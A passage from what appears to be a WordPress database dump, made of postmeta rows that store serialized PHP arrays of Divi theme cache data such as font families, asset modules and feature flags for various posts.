;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33863,935,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33864,744,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33865,744,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33851,1056,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33852,1623,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33853,1623,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33854,1623,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33847,1136,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33848,1056,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33849,1056,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33850,1056,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33843,1504,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33844,1136,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33845,1136,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33846,1136,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33839,682,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33840,1504,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33841,1504,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33842,1504,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33835,766,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33836,682,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33837,682,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33838,682,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33834,766,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33830,1067,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33831,1067,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33832,766,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33833,766,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33826,1055,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33827,1055,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33828,1067,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33829,1067,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33823,1447,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33824,1055,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33825,1055,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33822,1447,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33814,1552,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33815,1552,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33816,916,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33817,916,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33818,916,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33819,916,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33820,1447,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33821,1447,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33810,1224,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33811,1224,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33812,1552,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33813,1552,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33805,749,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33806,749,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33807,749,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33808,1224,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33809,1224,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33803,835,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s